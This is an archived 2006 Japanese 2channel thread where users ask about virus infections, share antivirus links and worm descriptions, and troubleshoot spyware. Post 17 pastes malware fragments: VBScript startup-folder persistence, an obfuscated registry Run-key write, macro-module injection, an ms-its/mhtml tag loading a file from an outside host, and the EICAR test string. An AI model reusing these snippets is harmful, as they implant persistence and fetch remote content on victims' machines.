2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ウィルス情報質問 総合スレッド★Part41】

1 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:00:38
前スレ
【ウィルス情報質問 総合スレッド★Part39】※実質40
http://pc8.2ch.net/test/read.cgi/sec/1163555394/

テンプレ
【使用OS】
【MicrosoftUpdate】
【使用セキュリティソフト】
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】
【その他の質問】

2 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:01:09
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■  ※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社 http://www.trendmicro.co.jp/home/
 製品名:ウイルスバスター2007インターネットセキュリティ他
・株式会社シマンテック http://www.symantec.com/region/jp/
 製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)http://www.vintage-solutions.com/Japanese/
製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
 製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
 製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 http://www.mcafee.com/jp/default.asp
 製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
 http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
 該当する場合は諦めてノートンかウィルスバスターを買いましょう。


3 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:01:40
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
 →常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
 →知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
 →ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
 →アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
 →怪しいファイルにウィルスが混入しているケースもよくあることです。
  怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
 もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
 http://www.ipa.go.jp/security/outline/todokede-j.html
 こちらに届け出の方法などが記載されています。
 E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。


4 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:02:11
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D

5 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:02:44
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。

Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html


6 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:03:15
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
  * Mail Delivery System (<受取人メールアドレス>)
  * Failure (<受取人メールアドレス>)
  * Delivered Message (<受取人メールアドレス>)
  * Deliver Mail (<受取人メールアドレス>)
  * Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
   例: date7386.pif 、 message19392.zip など

「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
  * Error
  * Status
  * Server Report
  * Mail Transaction Failed
  * Mail Delivery System
  * hello
  * hi
  [ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
  "test"
  "The message contains Unicode characters and has been sent as a binary attachment."
  "The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
  "Mail transaction failed. Partial message is available."
  [ 任意の文字列 ]  [ 空白 ]
・添付ファイル名: ランダムなアルファベット


7 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:03:50
「既出です」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
   ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8

Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp

Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
  デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
  ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ウイルス情報 Part59
http://tmp6.2ch.net/test/read.cgi/download/1165372312/

Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part9
http://pc8.2ch.net/test/read.cgi/sec/1158730729/

Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
エロサイトを見たら…助けてください!Part62
http://pc7.2ch.net/test/read.cgi/pcqa/1150380799/


8 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:04:22
感染の疑いがあり自分のアンチウイルスソフトで反応がない場合
他社のオンラインスキャンをするとウイルスが検出されることがあります

カスペルスキー:オンライン ウイルス&スパイウェアスキャナ 
http://www.kaspersky.co.jp/scanforvirus/
シマンテック・セキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
トレンド フレックス
http://trendflexsecurity.jp/free_security_tools/housecall_free_scan.php
削除可
BitDefender Online Scanner
http://www.bitdefender.com/scan8/ie.html
削除可
Panda ActiveScan
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
削除可
F-Secure オンラインスキャナ
http://www.f-secure.co.jp/v-descs/disinfestation.html
ウイルスチェイサー for WEB
http://www.viruschaser.jp/support_online.html

関連スレッド
オンラインによるウイルスチェックサービス
http://pc8.2ch.net/test/read.cgi/sec/1031073684/

※感染している場合ウイルスによっては外部と通信を行うものもありますので
パーソナルファイヤーウォール等でスキャンサイト以外の接続を遮断することをおすすめします


9 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:05:22
関連スレッド
セキュリティ初心者質問スレッドpart79
http://pc8.2ch.net/test/read.cgi/sec/1165470988/
Winnyを狙ったワーム・ニュイルス情報 Part59
http://tmp6.2ch.net/test/read.cgi/download/1165372312/
☆☆トロイの木馬☆☆3台目
http://pc8.2ch.net/test/read.cgi/sec/1132660933/
sasser【スタコラサッサ】sasser Part2
http://pc5.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ part5
http://pc8.2ch.net/test/read.cgi/sec/1065964513/
【緊急!】ウィルス即行駆除方法【助けて!】
http://pc8.2ch.net/test/read.cgi/sec/1091174837/
アンチウィルスソフトのウィルス誤検出
http://pc8.2ch.net/test/read.cgi/sec/1027753135/
毎日ウィルスメールが送られてくるのですが・・2通目
http://pc8.2ch.net/test/read.cgi/sec/1086494732/
【分析】HijackThis【研究】
http://pc8.2ch.net/test/read.cgi/sec/1091346741/


関連スレは次スレに移行してる場合もあります。


質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/

10 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:11:06
テンプレここまで

       ∧_∧
      ( ・∀・)   トロイ〜ワーム!!!
      ( ⊃┳⊃
     ε(_)ヘ⌒ヽフ
     (   ( ・ω・)
≡≡≡ ◎―◎⊃⊃


テンプレここまで


11 :名無しさん@お腹いっぱい。:2006/12/25(月) 22:36:51
>1 おつ〜
 :   :: ゚   : 。   〜  彡ミ
:  ゚     :。   〜  彡ミ彡ミ
  : 。 〜   : ゚  :: 彡ミ彡ミミミ
: . ::: 。 〜 : : .. ゚ 彡彡ミ彡ミミミ
. ゚ 〜 :: .  : :. 。  ;:ヽ|i゚∀゚ i|ノ アヒャヒャヒャ
゚  ::  ゚〜 : 。  :  : : |i!iハlハl!|

12 : ◆N9P3SuvBPo :2006/12/25(月) 22:41:21
>1
おつかれさ〜ん

13 :名無しさん@お腹いっぱい。:2006/12/25(月) 22:43:02

  ○< ̄ ̄\
     γ    )
     [二二二]
  γ⌒ヽ从*‘ー‘从<Merry Xmasだぎゃ!
  |   ∩3\,,/[]つ
  |   Y__:_)
.  \__(__)__)

14 :名無しさん@お腹いっぱい。:2006/12/25(月) 23:25:37
>>1
乙..._〆(゚▽゚*)

15 :名無しさん@お腹いっぱい。:2006/12/26(火) 02:29:22
どうでもいい事だが
Vistaへの乗り換えに自信のない人に自信を持ってお勧めできる無料OS、それがFedora Core

サンプル動画
高画質 http://stage6.divx.com/members/225743/videos/1032106
低画質 http://www.youtube.com/watch?v=ksxADo-4Q4k
サンプル画像
http://sylphys.ddo.jp/upld2nd/pc2/src/1166337336209.jpg
http://sylphys.ddo.jp/upld2nd/pc2/src/1166337908690.jpg
http://www.lynucs.org/index.php?screen_id=16160218054558aaec4d948&p=screen
http://www.lynucs.org/index.php?screen_id=12170238984554b554f0ad2&p=screen

FedoraというのはLinuxの一種で日本で最も普及しているLinux
インストールは ftp://ftp.sfc.wide.ad.jp/pub/Linux/Fedora/6/i386/iso/FC-6-i386-DVD.iso
のisoをDVDに焼いてパソコンを再起動すればいい
注意としてDVDはイメージとしてisoを焼くようにしないといけない
http://linux2ch.is.land.to/index.php?InstallCDCreationInfo が参考になるぞ
CDブート後の手順は http://itpro.nikkeibp.co.jp/article/COLUMN/20061101/252399/?ST=lin-os&P=2 を見てくれ。
アドバイスだが「SELinuxの設定」は無効にしておくことをお勧めする。
Windowsの管理者(Administrator)にあたるユーザーは、Linuxでは「root」という名前だ
そのままだとファイラーの設定が良くない→ http://linux2ch.is.land.to/index.php?GNOMEFAQs#a3077218
ゴミ箱には保存場所の記録がないらしい(KDEというのならある)
特許の関係で動画と音楽の再生に制限がある。divxとかはxine、mplayer,vlcなど自分でソフトを入れてくれ
ソフト更新ツールが少し重くて遅いことは勘弁してほしい
ウイルスの心配のないネット生活をエンジョイだ

初心者質問大歓迎掲示板↓
http://pc8.2ch.net/test/read.cgi/linux/1165323756/

実はMandriva Linux(Mandrake)の方が優れているとばっちゃが言ってた
http://pc8.2ch.net/test/read.cgi/linux/1099123314/768n-

16 :1:2006/12/26(火) 07:53:02
スレタイを【】で囲ってしまった orz


17 :名無しさん@お腹いっぱい。:2006/12/26(火) 08:55:23
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

18 :名無しさん@お腹いっぱい。:2006/12/26(火) 22:50:34
【使用OS】 デスクトップ
【MicrosoftUpdate】 127.0.0.1にリダイレクトされて出来ない
【使用セキュリティソフト】 F-Secure InternetSecurity 2007
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 できない
【どんな症状が出るか】 EXEファイル実行不可
【症状が出る前に何をやったか】 友達から届いたメールの添付ファイルを開いた
【症状を解決しようとどのような処置を取ったか】 あわててスイッチ切って再起動した
【その他の質問】 友達から届いたから安心して開いたんですが、ウイルスなんでしょうか?

19 : ◆N9P3SuvBPo :2006/12/26(火) 23:00:19
>18
まず、↓なw
>【使用OS】 デスクトップ
それPCの形態でOSではないから。

>【どんな症状が出るか】 EXEファイル実行不可
その拡張子がexeのファイルを実行しようとしたとき、何かエラーメッセージ
とかは出ない?
拡張子をcomに変えても実行は出来ないの?
手っ取り早い解決方法としてリカバリを奨めるけど?

>【その他の質問】 友達から届いたから安心して開いたんですが、ウイルスなんでしょうか?
友達からだろうと添付ファイルはウイルスと疑ってかかれ。

20 :18:2006/12/26(火) 23:13:08
>>19
バックアップは取ってあるからリカバリします。
自分のスキルでは駆除は無理そうですので。

21 :名無しさん@お腹いっぱい。:2006/12/27(水) 02:39:06
>>984
見受けたところあなた様にスキルがあるようには思えませんが、
パソコンの前で王様気取りになってらっしゃるだけではないですか?
裸の王様

22 :名無しさん@お腹いっぱい。:2006/12/27(水) 02:43:20
俺はルータもAVもいれているから気にする必要性は無いと思うんだけど、98や2000、XPで
ルータも持たずFWも持たず接続する人もいるわけでしょ。その場合は・・ってこと何だけど。
祈るしかないわけですか。でもその間に感染ってあまり聞かないような気がするなっておもうんだけど。
OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど

俺は入れ直しかノートンゴースト使ってるけど



だれかおしえてちょんまげ

やっぱり2000で98でルータ無しFW無しはまずいんだね、
そこまでは俺も知ってたけど、でもどのような感染経路で感染するの?

OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど

それとさ、なんでこれ41なの?前39だったよね・・

23 :これいれるんじゃなかったの:2006/12/27(水) 02:45:31
>>982
乙です 私は異論ありません
あとBOTに関してのテンプレを入れたほうがいいのではないかと思います
以下サイバークリーンセンターからの引用ですがいかがなものでしょうか

ボットにご注意!!
ボットとは、コンピュータを悪用することを目的に作られた悪性プログラムで、コンピュータに感染すると、
インターネットを通じて悪意を持った攻撃者(以下「攻撃者」という)が、あなたのコンピュータを外部から遠隔操作します。
感染すると、この攻撃者があなたのコンピュータを操り「迷惑メールの大量配信」、「特定サイトの攻撃」等の迷惑行為をはじめ、
あなたのコンピュータ内の情報を盗み出す「スパイ活動」など深刻な被害をもたらします。
この操られる動作が、ロボット(Robot)に似ているところから、ボット(BOT)と呼ばれています。

ボットに感染したコンピュータは、攻撃者が用意した指令サーバなどに自動的に接続され、
数十〜数百万台のボット感染コンピュータを従えた「ボットネットワーク」と言われる巨大ネットワークを形成します。
感染したコンピュータは、攻撃者からの命令を待ち受け、攻撃者が下す命令によって、攻撃者の意のままに数十〜数百万台の感染コンピュータが操られた結果、
フィッシング目的などのスパムメールの大量送信や、特定サイトへのDDoS攻撃などに利用され、とても大きな脅威となります。
このため、感染コンピュータを使用しているユーザーは、知らぬ間に犯罪の踏み台にされ、「被害者」であると同時に「加害者」にもなってしまうのです
〜サイバークリーンセンター より引用〜

サイバークリーンセンター ボットとは
https://www.ccc.go.jp/bot/index.html
TREND MICRO ボット系ウイルス対策Web
http://www.trendmicro.com/jp/security/web/archive/overview/bot.htm
インターネット上の新たな脅威「ボット(bot)」に気をつけろ!(上)
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20041215/153889/?ST=security

24 :名無しさん@お腹いっぱい。:2006/12/27(水) 02:46:12
新しいテンプレ(一部追記)は以下の通りで異論は無いでしょうか。

【使用OS】
【MicrosoftUpdate】
【使用セキュリティソフト】
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】
【その他の質問】

>【ルータの有無】
ぶっちゃけこれ要らないんじゃないと思う人もいるけど、
質問者がWindows2000でルータ無しでFWソフトも無しの環境で、
リカバリしなくちゃいけないような症状に陥っている場合、
それでリカバリしたは良いけど、その直後にネットに繋いで即再感染
という自体も有り得るので。(その際はルータか、FW付きアンチウイルスソフトの購入を奨める)
WindowsXPの場合はデフォルトでFWが入ってる(SP2の場合はデフォルトで有効になってる)
から、こちらのOSの場合はルータが無くてもFWを有効にさえしとけば、外部からの
侵入はとりあえず遮断できる。

25 :名無しさん@お腹いっぱい。:2006/12/27(水) 03:15:08
こいつ>>23何者?


26 :名無しさん@お腹いっぱい。:2006/12/27(水) 04:27:40
現在の更新の情報
合計時間: 28 s

- Vps: 更新されました
(前のバージョン: 0662-1, 更新後のバージョン: 0662-2)

サーバー: download6.avast.com (67.15.0.83)
ダウンロード・ファイル: 5 (1.24 KB)
ダウンロード時間: 8 s

27 :1:2006/12/27(水) 07:24:45
>>23
それ書いたの俺
テンプレにいれるのは時期が早いかなとおもったから
俺が書いたのはコピペだし 住人が知恵をだしあって練られたものを入れたかったから

このスレが41なのは38が重複して前スレが実質40だったからこのスレで番号修正しただけ


28 :名無しさん@お腹いっぱい。:2006/12/27(水) 07:35:56
>>27
>1おつです 17←こいつをどうにかしてください

29 :名無しさん@お腹いっぱい。:2006/12/27(水) 15:28:08
【使用OS】
XP home
【MicrosoftUpdate】
してる
【使用セキュリティソフト】
VB2006
【セキュリティソフトの定義ファイルは最新の状態であるか】
期限切れで最新ではない
【ルータの有無】
なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
検出なし
【どんな症状が出るか】
nyフォルダ内のファイルが全て画像(bmp)になる
その画像↓
http://up.mugitya.com/img/Lv.1_up69172.bmp
【症状が出る前に何をやったか】
nyで動画ファイル落として実行
【症状を解決しようとどのような処置を取ったか】
HDにつながってるUSB引っこ抜いた
ネット切断

30 :名無しさん@お腹いっぱい。:2006/12/27(水) 15:35:08
>>29
http://tmp6.2ch.net/test/read.cgi/download/1165372312/
Winnyを狙ったワーム・ニュイルス情報 Part59

31 :名無しさん@お腹いっぱい。:2006/12/27(水) 16:02:18
動画ファイルをどうやって「実行」するのか知りたい……。

32 :名無しさん@お腹いっぱい。:2006/12/27(水) 16:17:47
「メッセンジャー」からお知らせです、と
しつこく送られてくるものに、
どう対処したら良いのでしょうか?
どなたか、ご指導くださいませ?

33 :名無しさん@お腹いっぱい。:2006/12/27(水) 16:28:12
>>32
>どなたか、ご指導くださいませ?
なんで、疑問形で終わる?

とりあえず、何の事だか全然分からん。

34 :名無しさん@お腹いっぱい。:2006/12/27(水) 16:34:00
>>32
あんいんすと〜る

35 :名無しさん@お腹いっぱい。:2006/12/27(水) 17:32:31
>>29
今時ルーターもなけりゃウィルスソフトのUPDATEもしていない。
こんな環境でnyする奴っているんだなw



36 :名無しさん@お腹いっぱい。:2006/12/27(水) 18:25:04
ゴミどもうだうだいってねーでちゃんと答えろや
何のためにこの場所提供してやってんだよ
この世のクズが

37 : ◆N9P3SuvBPo :2006/12/27(水) 18:30:42
>32
これって俗に言うメッセンジャースパムとか言う奴ではないでしょうかね?

>29
P2P系とはあまり関わりたくないものですね。
XPでルータ無しだとすると、リカバリ後ネットに繋ぐ前に…
あとは任せたw

38 :名無しさん@お腹いっぱい。:2006/12/27(水) 19:05:21
俺はルータもAVもいれているから気にする必要性は無いと思うんだけど、98や2000、XPで
ルータも持たずFWも持たず接続する人もいるわけでしょ。その場合は・・ってこと何だけど。
祈るしかないわけですか。でもその間に感染ってあまり聞かないような気がするなっておもうんだけど。
OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど

俺は入れ直しかノートンゴースト使ってるけど



だれかおしえてちょんまげ

やっぱり2000で98でルータ無しFW無しはまずいんだね、
そこまでは俺も知ってたけど、でもどのような感染経路で感染するの?

OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど


39 :名無しさん@お腹いっぱい。:2006/12/27(水) 19:43:05
Windows XP SP2 適用済みインストールイメージの作成方法
http://support.microsoft.com/kb/884746/ja

ワームに感染しない Windows 2000/XP のインストール手順
http://tomcat.nyanta.jp/t_html/contents/wininstall.shtml


40 :名無しさん@お腹いっぱい。:2006/12/27(水) 20:01:29
ネットワークワームがポートの開いているネットワークサービスにパケットを送信してバッファオーバーフローが発生。
この時点でレジスタ内の戻りアドレスが偽装されているので
メモリ上のそのアドレスから実行されて何でもインストールされてしまう。

41 :名無しさん@お腹いっぱい。:2006/12/27(水) 20:44:22
>>39
センキューベルマエロッチ

42 :名無しさん@お腹いっぱい。:2006/12/27(水) 20:55:02
SP2適用済イメージ作成段階でエラー出るかもしれませんが、解決方法は・・・教えませんよ(´・ε・`)

43 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:05:42
【使用OS】 windows XP
【MicrosoftUpdate】 してます
【使用セキュリティソフト】 ウイルスセキュリティー
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新です
【ルータの有無】 無し
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 Win32.Bolzano.5396.b
【どんな症状が出るか】 わかりません
【症状が出る前に何をやったか】mp3が入ったzipのダウンロード&wavをmp3にエンコードするフリーソフト をインストールしました
【症状を解決しようとどのような処置を取ったか】 ウイルスセキュリティーで削除しました
【その他の質問】このウイルスに感染するとどうなるのですか

44 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:08:50
>>43
ソースネクストのサイトにウイルス情報公開してんじゃね?

45 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:25:14
>>43
ttp://www.symantec.com/region/jp/sarcj/data/w/w32.bolzano.html
これかな?

46 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:41:55
>>44
>>45
ありがとうございました
読んでも理解出来ないのですが...
XPでは影響ないのでしょうか?

ひとつ思い出したのですが、ウイルスセキュリティーのファイアーウォールの履歴が残らない現象が続いてました
これ関係ありそうですか?どなたかご存知の方教えてください

今は昨日バージョンアップしたばかりで昨日からの履歴は残っています

47 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:43:39
>>46
とりあえず心配なら>>8の各種オンラインスキャンを試してみたら?

48 : ◆N9P3SuvBPo :2006/12/27(水) 21:49:33
>43
>ウイルス名:Win32.Bolzano.5396.b
検出された場所は?

>46
>ファイアーウォールの履歴が残らない現象
これ、何時からなってた?
43のWin32.Bolzano.5396.bが検出される前・後?

49 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:49:57
>>47
そうしてみます
ありがとうございました

50 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:56:57
>>48
WINDOWSの中のrepairです
DS_SOFTWAREというファイルでした

Bolzanoが検出されるずっと前から履歴が残らない状態でした
ウイルスセキュリティーを再インストールすれとしばらくは履歴が残っていました
何をきっかけに履歴が残らないのか分らないのですが
Outlook Express が圧縮するようにメッセージが出てました(関係ないかも)

51 : ◆N9P3SuvBPo :2006/12/27(水) 22:12:15
>50
削除したんなら、何の心配はいらないと思うけど、それでも
心配なら>47の指示をやって、何も検出されなかったら
しばらく様子見かな?

そして
FWの履歴が残らなくなってる件については、
サポートに問い合わせてみたほうが良いと思われます。
もしくはグーグルで検索して原因を調べるとか。

52 :名無しさん@お腹いっぱい。:2006/12/27(水) 22:29:23
このファイル
Doom_2_wad_cracked_by_DFT_S60_v1.0.sis

http:〜〜〜〜みたいにしたやつある?

53 :名無しさん@お腹いっぱい。:2006/12/27(水) 22:36:21
>>51
ありがとうございました

54 :名無しさん@お腹いっぱい。:2006/12/28(木) 01:30:40
>>42
それは困るぞ!それに俺98SEなんだけど・・・・・・・・・・・・・・・・・・・・うぉぉぉっぉぉお
どうしたらいい



55 :名無しさん@お腹いっぱい。:2006/12/28(木) 13:36:23
shareEDGEのサイトにあるオンラインスキャンを実行すると前スレの262と同じ結果が
でてSmiley Sourceが検出されるのですがこのオンラインスキャンサービスでは削除
できません。
spybotでは検出されません。X-Cleaner買ってね♪ってことですかねww



56 :名無しさん@お腹いっぱい。:2006/12/28(木) 14:13:41
>>55
下記のURLにたくさんフリーのアンチスパイウェアソフトがあるので、
運が行ければどれかで駆除できるかも。w
まあ、いちいち試してみるのが面倒なら、最初からおとなしくX-Cleaner買う。
http://cowscorpion.com/Software/secu02s.html



57 :名無しさん@お腹いっぱい。:2006/12/28(木) 17:39:24
SpyMarshalってプログラムがかってにインストールされました削除法おしえてください
検索しても外国のサイトしかでません
日本語訳したんですけど 危ないウィルスとしかわかりません
おねがいします!!

58 :名無しさん@お腹いっぱい。:2006/12/28(木) 18:02:10
>>57
http://www.superantispyware.com/?
で駆除汁

59 :名無しさん@お腹いっぱい。:2006/12/28(木) 18:39:58
>>57
BraveSentryのクローンらしいね いわゆるインチキセキュりティソフト
exploitを利用してるみたいだから各種updateは最新に
BraveSentryならこれで駆除できるみたいだけど
http://wiki.higaitaisaku.com/wiki.cgi?page=SmitfraudFix+%A4%CE%BB%C8%A4%A4%CA%FD
あとcounterspyが対応してるらしい ベータもあるけど評判わるいからなあ

それとマルチ乙w


60 :名無しさん@お腹いっぱい。:2006/12/29(金) 10:22:54
>>56
アリガト♪
買うのくやしいから、なんとか手動で駆除できないかな。
まぁそんなに悪質なものでないので無視しときます。


61 :55,60:2006/12/29(金) 16:03:23
検索して解決しました。
使っているカスペルスキーインターネットセキュリティーのレジストリエントリが誤検出されるようです。
カスペルスキーのスレにもレスしときましたが、前スレの262さんKISを使っていませんか。



62 :55,60:2006/12/29(金) 16:10:12
×前スレ262
○前スレ261
カスぺいれてるってかかれてますねw

63 :名無しさん@お腹いっぱい。:2006/12/30(土) 22:20:04

※新型botにご注意を※

